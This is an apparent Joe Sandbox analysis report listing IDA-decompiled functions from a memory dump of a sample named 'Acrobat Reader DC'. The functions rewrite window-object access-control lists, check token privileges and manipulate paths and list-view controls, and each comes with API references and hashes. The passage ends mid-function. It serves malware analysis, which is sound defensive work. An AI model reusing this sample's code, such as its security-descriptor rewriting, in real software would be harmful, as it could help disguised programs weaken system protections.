                                  • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                  • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                  • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00446124(void* __eflags, void* _a4, void* _a8, intOrPtr _a12) {
                                  				char _v5;
                                  				struct _ACL* _v12;
                                  				void* _v16;
                                  				struct _ACL* _v20;
                                  				struct _ACL* _v24;
                                  				long _v28;
                                  				char _v32;
                                  				int _v36;
                                  				int _v40;
                                  				intOrPtr _v48;
                                  				void _v52;
                                  				struct _ACL* _t70;
                                  				void* _t74;
                                  				void* _t78;
                                  				void* _t84;
                                  				void _t88;
                                  				struct _ACL* _t94;
                                  				signed short _t113;
                                  				intOrPtr* _t115;
                                  				struct _SECURITY_DESCRIPTOR* _t116;
                                  				long _t117;
                                  				void* _t118;
                                  				void* _t119;
                                  
                                  				_t118 = 0;
                                  				_t94 = 0;
                                  				_v5 = 0;
                                  				_v20 = 0;
                                  				_v24 = 0;
                                  				_v16 = 0;
                                  				_v28 = 4;
                                  				if(E00436E2B(_a4,  &_v28,  &_v20,  &_v32) == 0 || E00436DF7( &_v24, _v32) == 0) {
                                  					L20:
                                  					E00436BA9(_v20);
                                  					E00436BA9(_v24);
                                  					E00436BA9(_t94);
                                  					E00436BA9(_t118);
                                  					return _v5;
                                  				} else {
                                  					_v12 = 0;
                                  					if(GetSecurityDescriptorDacl(_v20,  &_v36,  &_v12,  &_v40) == 0) {
                                  						goto L20;
                                  					}
                                  					E00412F40( &_v52, 0, 0xc);
                                  					_t70 = _v12;
                                  					_t119 = _t119 + 0xc;
                                  					_v48 = 8;
                                  					if(_t70 == 0 || GetAclInformation(_t70,  &_v52, 0xc, 2) != 0) {
                                  						_t24 = GetLengthSid(_a8) * 2; // 0x18
                                  						_t74 = E00436DBF( &_v16, _v48 + _t24 + 0x10);
                                  						_t94 = _v16;
                                  						if(_t74 == 0) {
                                  							goto L20;
                                  						}
                                  						if(_v36 == _t118) {
                                  							L12:
                                  							_t36 = GetLengthSid(_a8) + 8; // 0x8
                                  							_t113 = _t36;
                                  							_t118 = E00436B91(_t113);
                                  							_t119 = _t119 + 4;
                                  							if(_t118 == 0) {
                                  								goto L20;
                                  							}
                                  							_t78 = _a8;
                                  							_t38 = _t118 + 8; // 0x8
                                  							 *(_t118 + 2) = _t113;
                                  							if(CopySid(GetLengthSid(_t78), _t38, _t78) == 0) {
                                  								goto L20;
                                  							}
                                  							_a8 = 0;
                                  							_t115 = _a12 + 4;
                                  							while(1) {
                                  								 *_t118 =  *((intOrPtr*)(_t115 - 4));
                                  								 *((char*)(_t118 + 1)) =  *((intOrPtr*)(_t115 - 3));
                                  								 *((intOrPtr*)(_t118 + 4)) =  *_t115;
                                  								if(AddAce(_t94, 2, 0xffffffff, _t118,  *(_t118 + 2) & 0x0000ffff) == 0) {
                                  									goto L20;
                                  								}
                                  								_t84 = _a8 + 1;
                                  								_t115 = _t115 + 0xc;
                                  								_a8 = _t84;
                                  								if(_t84 < 2) {
                                  									continue;
                                  								}
                                  								_t116 = _v24;
                                  								if(SetSecurityDescriptorDacl(_t116, 1, _t94, 0) != 0 && SetUserObjectSecurity(_a4,  &_v28, _t116) != 0) {
                                  									_v5 = 1;
                                  								}
                                  								goto L20;
                                  							}
                                  							goto L20;
                                  						}
                                  						_t88 = _v52;
                                  						if(_t88 == _t118) {
                                  							goto L12;
                                  						}
                                  						_t117 = 0;
                                  						if(_t88 <= _t118) {
                                  							goto L12;
                                  						}
                                  						while(GetAce(_v12, _t117,  &_v16) != 0 && AddAce(_t94, 2, 0xffffffff, _v16,  *(_v16 + 2) & 0x0000ffff) != 0) {
                                  							_t117 = _t117 + 1;
                                  							if(_t117 < _v52) {
                                  								continue;
                                  							}
                                  							goto L12;
                                  						}
                                  					}
                                  					goto L20;
                                  				}
                                  			}



























                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                  • _memset.LIBCMT ref: 0044619F
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                  • SetUserObjectSecurity.USER32 ref: 004462D8
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3490752873-0
                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00445F35(void* __eflags, void* _a4, void* _a8, intOrPtr _a12) {
                                  				char _v5;
                                  				struct _ACL* _v12;
                                  				void* _v16;
                                  				struct _ACL* _v20;
                                  				struct _ACL* _v24;
                                  				long _v28;
                                  				char _v32;
                                  				int _v36;
                                  				int _v40;
                                  				intOrPtr _v48;
                                  				void _v52;
                                  				struct _ACL* _t70;
                                  				void* _t74;
                                  				void* _t78;
                                  				void* _t84;
                                  				void _t88;
                                  				struct _ACL* _t94;
                                  				signed short _t113;
                                  				intOrPtr* _t115;
                                  				struct _SECURITY_DESCRIPTOR* _t116;
                                  				long _t117;
                                  				void* _t118;
                                  				void* _t119;
                                  
                                  				_t118 = 0;
                                  				_t94 = 0;
                                  				_v5 = 0;
                                  				_v20 = 0;
                                  				_v24 = 0;
                                  				_v16 = 0;
                                  				_v28 = 4;
                                  				if(E00436E2B(_a4,  &_v28,  &_v20,  &_v32) == 0 || E00436DF7( &_v24, _v32) == 0) {
                                  					L20:
                                  					E00436BA9(_v20);
                                  					E00436BA9(_v24);
                                  					E00436BA9(_t94);
                                  					E00436BA9(_t118);
                                  					return _v5;
                                  				} else {
                                  					_v12 = 0;
                                  					if(GetSecurityDescriptorDacl(_v20,  &_v36,  &_v12,  &_v40) == 0) {
                                  						goto L20;
                                  					}
                                  					E00412F40( &_v52, 0, 0xc);
                                  					_t70 = _v12;
                                  					_t119 = _t119 + 0xc;
                                  					_v48 = 8;
                                  					if(_t70 == 0 || GetAclInformation(_t70,  &_v52, 0xc, 2) != 0) {
                                  						_t24 = GetLengthSid(_a8) * 2; // 0x18
                                  						_t74 = E00436DBF( &_v16, _v48 + _t24 + 0x10);
                                  						_t94 = _v16;
                                  						if(_t74 == 0) {
                                  							goto L20;
                                  						}
                                  						if(_v36 == _t118) {
                                  							L12:
                                  							_t36 = GetLengthSid(_a8) + 8; // 0x8
                                  							_t113 = _t36;
                                  							_t118 = E00436B91(_t113);
                                  							_t119 = _t119 + 4;
                                  							if(_t118 == 0) {
                                  								goto L20;
                                  							}
                                  							_t78 = _a8;
                                  							_t38 = _t118 + 8; // 0x8
                                  							 *(_t118 + 2) = _t113;
                                  							if(CopySid(GetLengthSid(_t78), _t38, _t78) == 0) {
                                  								goto L20;
                                  							}
                                  							_a8 = 0;
                                  							_t115 = _a12 + 4;
                                  							while(1) {
                                  								 *_t118 =  *((intOrPtr*)(_t115 - 4));
                                  								 *((char*)(_t118 + 1)) =  *((intOrPtr*)(_t115 - 3));
                                  								 *((intOrPtr*)(_t118 + 4)) =  *_t115;
                                  								if(AddAce(_t94, 2, 0xffffffff, _t118,  *(_t118 + 2) & 0x0000ffff) == 0) {
                                  									goto L20;
                                  								}
                                  								_t84 = _a8 + 1;
                                  								_t115 = _t115 + 0xc;
                                  								_a8 = _t84;
                                  								if(_t84 < 1) {
                                  									continue;
                                  								}
                                  								_t116 = _v24;
                                  								if(SetSecurityDescriptorDacl(_t116, 1, _t94, 0) != 0 && SetUserObjectSecurity(_a4,  &_v28, _t116) != 0) {
                                  									_v5 = 1;
                                  								}
                                  								goto L20;
                                  							}
                                  							goto L20;
                                  						}
                                  						_t88 = _v52;
                                  						if(_t88 == _t118) {
                                  							goto L12;
                                  						}
                                  						_t117 = 0;
                                  						if(_t88 <= _t118) {
                                  							goto L12;
                                  						}
                                  						while(GetAce(_v12, _t117,  &_v16) != 0 && AddAce(_t94, 2, 0xffffffff, _v16,  *(_v16 + 2) & 0x0000ffff) != 0) {
                                  							_t117 = _t117 + 1;
                                  							if(_t117 < _v52) {
                                  								continue;
                                  							}
                                  							goto L12;
                                  						}
                                  					}
                                  					goto L20;
                                  				}
                                  			}



























                                  APIs
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00445F9B
                                  • _memset.LIBCMT ref: 00445FB0
                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445FCF
                                  • GetLengthSid.ADVAPI32(?), ref: 00445FE1
                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044601E
                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0044603A
                                  • GetLengthSid.ADVAPI32(?), ref: 00446052
                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044607B
                                  • CopySid.ADVAPI32(00000000), ref: 00446082
                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004460B4
                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004460D6
                                  • SetUserObjectSecurity.USER32 ref: 004460E9
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                  • String ID:
                                  • API String ID: 3490752873-0
                                  • Opcode ID: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                  • Instruction ID: 246472a61925077f0ce062fd926fe76963597eff5ae69a3ad94d9fcadac7f974
                                  • Opcode Fuzzy Hash: 47742338c970596221c3926e6b4b4bf415b8072ff702eac902e9f585fe699a5a
                                  • Instruction Fuzzy Hash: FD51C0B1900209ABEB10DFA5DC84EEFB778AF49704F04C41EF515A7241D7B8E905CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00433784(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				char _v526;
                                  				char _v528;
                                  				char _v1052;
                                  				char _v1574;
                                  				char _v1576;
                                  				char _v2100;
                                  				char _v2624;
                                  				char _v3148;
                                  				char _v3672;
                                  				char _v4196;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* _t38;
                                  				char* _t53;
                                  				void* _t61;
                                  				intOrPtr _t81;
                                  				void* _t84;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t87;
                                  
                                  				_t61 = __ebx;
                                  				E00422240(0x1060);
                                  				_t82 = _a16;
                                  				_t81 = _a20;
                                  				_t38 = E00413E1F(_a16, 0x2a);
                                  				_t85 = _t84 + 8;
                                  				if(_t38 != 0) {
                                  					E00413A0E(_a4,  &_v2100,  &_v3148,  &_v4196,  &_v528);
                                  					E00413A0E(_t82,  &_v2100,  &_v3148,  &_v3672,  &_v1576);
                                  					_t86 = _t85 + 0x28;
                                  					if(_v528 == 0x2e) {
                                  						E00411567( &_v528,  &_v526);
                                  						_t86 = _t86 + 8;
                                  					}
                                  					if(_v1576 == 0x2e) {
                                  						E00411567( &_v1576,  &_v1574);
                                  						_t86 = _t86 + 8;
                                  					}
                                  					E00411567(_t81,  &_v2100);
                                  					E00411536(_t81,  &_v3148);
                                  					E004336C5(_t61,  &_v1576, _t81, 0x2e,  &_v528, _a12,  &_v1576,  &_v2624);
                                  					E004336C5(_t61,  &_v4196, _t81, 0x2e,  &_v4196, _a8,  &_v3672,  &_v1052);
                                  					_t87 = _t86 + 0x30;
                                  					if(_v2624 == 0) {
                                  						if(_v528 != 0) {
                                  							E00411536( &_v1052, ".");
                                  							_t53 =  &_v528;
                                  							goto L10;
                                  						}
                                  					} else {
                                  						E00411536( &_v1052, ".");
                                  						_t53 =  &_v2624;
                                  						L10:
                                  						E00411536( &_v1052, _t53);
                                  						_t87 = _t87 + 0x10;
                                  					}
                                  					return E00411536(_t81,  &_v1052);
                                  				} else {
                                  					return E00411567(_t81, _t82);
                                  				}
                                  			}
























                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                  • String ID:
                                  • API String ID: 136442275-0
                                  • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                  • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                  • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00436F47() {
                                  				void* _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				char _v20;
                                  				WCHAR* _v24;
                                  				struct _LUID _v32;
                                  				char _v36;
                                  				struct _LUID _v44;
                                  				void* _t32;
                                  				void* _t39;
                                  				void* _t41;
                                  				intOrPtr _t45;
                                  				intOrPtr* _t46;
                                  				intOrPtr* _t48;
                                  				intOrPtr* _t54;
                                  				void* _t58;
                                  				void* _t59;
                                  
                                  				_t54 = 0;
                                  				_v8 = 0;
                                  				_v12 = 0;
                                  				_t45 = 0;
                                  				_v20 = 0;
                                  				if(OpenThreadToken(GetCurrentProcess(), 8, 0,  &_v8) != 0 || OpenProcessToken(GetCurrentProcess(), 8,  &_v8) != 0) {
                                  					if(E00436BC5(_v8,  &_v12,  &_v20) == 0 || LookupPrivilegeValueW(0, L"SeAssignPrimaryTokenPrivilege",  &_v44) == 0) {
                                  						L17:
                                  						_t54 = _v12;
                                  					} else {
                                  						_v36 = 0;
                                  						if(LookupPrivilegeValueW(0, L"SeIncreaseQuotaPrivilege",  &_v32) == 0) {
                                  							goto L17;
                                  						} else {
                                  							_v24 = 0;
                                  							_t54 = _v12;
                                  							_t58 = 0;
                                  							if( *_t54 > 0) {
                                  								_v12 = _t54 + 4;
                                  								do {
                                  									_t46 =  &_v36;
                                  									_v16 = 2;
                                  									do {
                                  										_t41 = E004119E3(_v12, _t46 - 8, 8);
                                  										_t59 = _t59 + 0xc;
                                  										if(_t41 == 0) {
                                  											 *_t46 = 1;
                                  										}
                                  										_t46 = _t46 + 0xc;
                                  										_t20 =  &_v16;
                                  										 *_t20 = _v16 - 1;
                                  									} while ( *_t20 != 0);
                                  									_v12 = _v12 + 0xc;
                                  									_t58 = _t58 + 1;
                                  								} while (_t58 <  *_t54);
                                  							}
                                  							_t45 = 1;
                                  							_t39 = 0;
                                  							_t48 =  &_v36;
                                  							while( *_t48 != 0) {
                                  								_t39 = _t39 + 1;
                                  								_t48 = _t48 + 0xc;
                                  								if(_t39 < 2) {
                                  									continue;
                                  								} else {
                                  								}
                                  								goto L18;
                                  							}
                                  							_t45 = 0;
                                  						}
                                  					}
                                  				}
                                  				L18:
                                  				_t32 = _v8;
                                  				if(_t32 != 0) {
                                  					CloseHandle(_t32);
                                  				}
                                  				E00436BA9(_t54);
                                  				return _t45;
                                  			}

                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000008,00000000,?), ref: 00436F6A
                                  • OpenThreadToken.ADVAPI32(00000000), ref: 00436F6D
                                  • GetCurrentProcess.KERNEL32(00000008,?), ref: 00436F7D
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00436F80
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 00436FB9
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00436FD0
                                  • _memcmp.LIBCMT ref: 00437001
                                  • CloseHandle.KERNEL32(?), ref: 0043704B
                                  Strings
                                  • SeAssignPrimaryTokenPrivilege, xrefs: 00436FB1
                                  • SeIncreaseQuotaPrivilege, xrefs: 00436FC7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
                                  • String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
                                  • API String ID: 1446985595-805462909
                                  • Opcode ID: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                  • Instruction ID: 5d9cc79d75c838d3750a3a1f44766322371bceb9368f6a60d1057fe533f678da
                                  • Opcode Fuzzy Hash: 20e3785b7433241d37dd94a03bfa4397e83b78d22b2bbb476a85e96c63628419
                                  • Instruction Fuzzy Hash: 6531BEB2D40209ABDF20DBA1CD44AEFBBB8FB88310F14545BE940A7240D7789A45CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00448123(void* __eflags, intOrPtr _a4, signed short _a8, char _a12, signed int _a16) {
                                  				int _v8;
                                  				signed char _v12;
                                  				intOrPtr _v16;
                                  				long _v20;
                                  				signed short _v28;
                                  				intOrPtr _v32;
                                  				long _v40;
                                  				long _v52;
                                  				long _v56;
                                  				void* _v60;
                                  				void* _v8252;
                                  				intOrPtr _t79;
                                  				long _t81;
                                  				long _t85;
                                  				long _t89;
                                  				intOrPtr _t92;
                                  				long _t95;
                                  				signed short _t99;
                                  				long _t101;
                                  				signed int _t105;
                                  				intOrPtr _t107;
                                  				intOrPtr _t108;
                                  				intOrPtr _t109;
                                  				intOrPtr _t114;
                                  				intOrPtr _t116;
                                  				signed short _t121;
                                  				intOrPtr _t129;
                                  				intOrPtr _t135;
                                  				struct HWND__* _t140;
                                  
                                  				E00422240(0x203c);
                                  				if(E00441AF5(0x4a8630, _a16,  &_a16,  &_v8) == 0) {
                                  					L15:
                                  					__eflags = 0;
                                  					return 0;
                                  				} else {
                                  					_t107 =  *0x4a8690; // 0x0
                                  					_t108 =  *0x4a86a4; // 0xa71980
                                  					_t105 = _v8;
                                  					_v16 =  *((intOrPtr*)( *((intOrPtr*)(_t107 + _a16 * 4))));
                                  					_t140 =  *( *( *(_t108 + _t105 * 4)));
                                  					_t79 = _a4;
                                  					 *(_t79 + 0x30) = _t140;
                                  					_t109 =  *0x4a86a4; // 0xa71980
                                  					 *((char*)(_t79 + 0x8b)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + _t105 * 4)))) + 0x8b));
                                  					_t81 = SendMessageW(SendMessageW(_t140, 0x101f, 0, 0), 0x1200, 0, 0);
                                  					 *(_a4 + 0x8c) = _t81;
                                  					_t129 =  *0x4a86a4; // 0xa71980
                                  					_v20 = _t81;
                                  					 *( *((intOrPtr*)( *((intOrPtr*)(_t129 + _t105 * 4)))) + 0x8c) = _t81;
                                  					_v12 = GetWindowLongW(_t140, 0xfffffff0);
                                  					E00412F40( &_v60, 0, 0x28);
                                  					_t85 = SendMessageW(_t140, 0x1004, 0, 0);
                                  					 *(_a4 + 0x80) = _t85;
                                  					_t114 =  *0x4a86a4; // 0xa71980
                                  					_v60 = 7;
                                  					_v32 = 0xfffffffe;
                                  					_t116 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + _t105 * 4)))) + 0x94));
                                  					_a16 = 1;
                                  					_t145 = _t116 - 0xffffffff;
                                  					if(_t116 > 0xffffffff) {
                                  						_v32 = _t116;
                                  					}
                                  					_v56 = _t85;
                                  					_v40 =  &_v8252;
                                  					_v28 = _a8;
                                  					_v52 = 0;
                                  					E00430626(_t145,  &_v8252,  &_a12, 0x4a8644);
                                  					_t89 = SendMessageW(_t140, 0x104d, 0,  &_v60);
                                  					_v8 = _t89;
                                  					_t146 = _t89 - 0xffffffff;
                                  					if(_t89 == 0xffffffff) {
                                  						goto L15;
                                  					} else {
                                  						while(E00430626(_t146,  &_v8252,  &_a12, 0x4a8644) != 0) {
                                  							_t95 = _a16;
                                  							_v52 = _t95;
                                  							if(_t95 > _v20) {
                                  								SendMessageW(_t140, 0x1008, _v8,  &_v60);
                                  								goto L15;
                                  							} else {
                                  								if(_v8252 == 0 || SendMessageW(_t140, 0x1074, _v8,  &_v60) != 0) {
                                  									if((_v12 & 0x00000001) != 0) {
                                  										_t99 = SendMessageW(_t140, 0x1057, 0,  &_v8252) + 0xc;
                                  										_a8 = _t99;
                                  										if(_t99 > 0x96) {
                                  											_a8 = 0x96;
                                  										}
                                  										_t101 = SendMessageW(_t140, 0x101d, _a16, 0);
                                  										_t121 = _a8;
                                  										_t146 = _t101 - _t121;
                                  										if(_t101 <= _t121) {
                                  											SendMessageW(_t140, 0x101e, _a16, _t121 & 0x0000ffff);
                                  										}
                                  									}
                                  									_a16 = _a16 + 1;
                                  									continue;
                                  								} else {
                                  									goto L15;
                                  								}
                                  							}
                                  							goto L19;
                                  						}
                                  						_t135 = _a4;
                                  						__eflags =  *((char*)(_t135 + 0x8b)) - 0xff;
                                  						if( *((char*)(_t135 + 0x8b)) != 0xff) {
                                  							_t92 =  *0x4a86a4; // 0xa71980
                                  							E00430B87(_v16,  *((intOrPtr*)( *((intOrPtr*)(_t92 + _t105 * 4)))), 1);
                                  						}
                                  						return 1;
                                  					}
                                  				}
                                  				L19:
                                  			}

                                  APIs
                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                  • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                  • _memset.LIBCMT ref: 004481E0
                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                  • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                  • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                  • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                  • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSend$LongWindow_memset
                                  • String ID:
                                  • API String ID: 830647256-0
                                  • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                  • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                  • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00479362(void* __eflags, void* __fp0, char _a4) {
                                  				char _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				char _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				char _v36;
                                  				signed int _v40;
                                  				intOrPtr _v44;
                                  				char _v52;
                                  				void* __ebx;
